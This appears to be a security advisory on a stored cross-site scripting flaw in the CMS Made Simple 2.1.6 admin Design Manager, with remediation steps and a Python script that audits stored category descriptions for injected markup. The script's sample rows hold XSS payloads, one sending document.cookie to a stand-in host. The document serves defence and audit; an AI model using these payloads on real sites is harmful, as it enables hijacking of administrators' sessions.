Cross Site Scripting (Category Description) (CMS Made Simple)
Description
CMS Made Simple version 2.1.6 contains a stored Cross-Site Scripting (XSS) vulnerability in the administrative interface at /admin/moduleinterface.php. An authenticated user with access to the Design Manager can inject JavaScript or HTML through the Category Description field (the m1_description parameter); the value is saved without adequate output encoding. When another administrator views the affected category, the injected script executes in that administrator's browser, with their admin session, and can hijack the session or perform administrative actions on their behalf.
Remediation
Upgrade CMS Made Simple to version 2.2 or later, which addresses this vulnerability. If immediate upgrading is not possible, implement the following temporary mitigations:
1. Restrict access to the Design Manager and category management features to trusted administrators only; the attacker needs an account that can edit category descriptions
2. Serve a Content Security Policy (CSP) header on the /admin/ path that disallows inline scripts, and test that the administrative interface still functions under it, since admin pages that rely on inline scripts will break until those scripts are moved to nonce- or hash-allowed sources
3. Review all existing category descriptions for injected markup (script elements, on* event-handler attributes, javascript: URLs) and remove or encode anything found
4. Monitor administrative access logs, in particular for edits to category descriptions by unexpected accounts or from unexpected source addresses
For custom implementations, HTML-encode the description at the point where it is written into the page, so whatever was stored is rendered as text rather than interpreted as markup. htmlspecialchars() with ENT_QUOTES encodes both quote styles, which matters when the value lands inside an attribute; it does not make a value safe inside a JavaScript block or a URL, which need their own context-specific encoders:
// Example PHP: HTML-encode the submitted description before it is written into an HTML response
$description = htmlspecialchars($_POST['m1_description'], ENT_QUOTES, 'UTF-8');
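The following is an added example, not code from CMS Made Simple, that covers two of the points above: the review of existing category descriptions (mitigation 3) and the output encoding just described. It assumes the category rows have already been exported from the CMSMS database; the rows below are constructed samples, and the column layout (id, name, description) is an assumption rather than the product's schema. The parser decodes character references in attribute values before checking them, so an entity-encoded `&#106;avascript:` URL is still caught.

```python
"""Audit stored category descriptions for injected markup and show the
HTML-encoded form that a template should emit instead.

Added example; not CMS Made Simple code. The input is assumed to be rows
exported from the CMS database as (category_id, name, description).
"""
import html
import re
from html.parser import HTMLParser

# Elements that have no business in a category description.
SCRIPT_TAGS = {"script", "iframe", "object", "embed", "svg", "math",
               "link", "meta", "base", "form"}
# Attributes whose value is a URL and can therefore carry a javascript: scheme.
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data"}
# Leading whitespace is tolerated by browsers, so it is tolerated here too.
# (Control characters inside the scheme name are not handled; browsers strip
# some of them, so treat this as a triage aid, not a complete filter.)
DANGEROUS_SCHEMES = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.IGNORECASE)


class XssIndicatorParser(HTMLParser):
    """Collect XSS indicators from one description."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names and decodes entities
        # in attribute values, so "&#106;avascript:" arrives as "javascript:".
        if tag in SCRIPT_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name} handler on <{tag}>")
            elif name in URL_ATTRS and value and DANGEROUS_SCHEMES.match(value):
                self.findings.append(f"{name}={value!r} on <{tag}>")


def audit_description(description):
    """Return a list of indicator strings for one description (empty if clean)."""
    parser = XssIndicatorParser()
    parser.feed(description)
    parser.close()
    return parser.findings


def audit_categories(rows):
    """Map category_id -> findings for every row that has at least one finding."""
    flagged = {}
    for category_id, _name, description in rows:
        findings = audit_description(description or "")
        if findings:
            flagged[category_id] = findings
    return flagged


def render_safely(description):
    """The encoded form a template should emit: equivalent to PHP
    htmlspecialchars(..., ENT_QUOTES, 'UTF-8'), both quote styles covered."""
    return html.escape(description, quote=True)


# Constructed sample rows standing in for the exported category table.
SAMPLE_ROWS = [
    (1, "Layouts", "Default page layouts for the <b>public</b> site"),
    (2, "Blog", "<img src=x onerror=\"fetch('/admin/' + document.cookie)\">Blog templates"),
    (3, "Landing", '<a href="&#106;avascript:alert(document.domain)">Campaign pages</a>'),
    (4, "Archive", "Old templates <script>new Image().src='//example.invalid/?c='+document.cookie</script>"),
]

if __name__ == "__main__":
    for cid, findings in audit_categories(SAMPLE_ROWS).items():
        print(f"category {cid}: {', '.join(findings)}")
    # What the Blog description looks like once encoded for output.
    print(render_safely(SAMPLE_ROWS[1][2]))
```

Run the script against the real export; every flagged row should be cleaned in the database, not just encoded on the way out, because other templates or modules may render the same column without encoding.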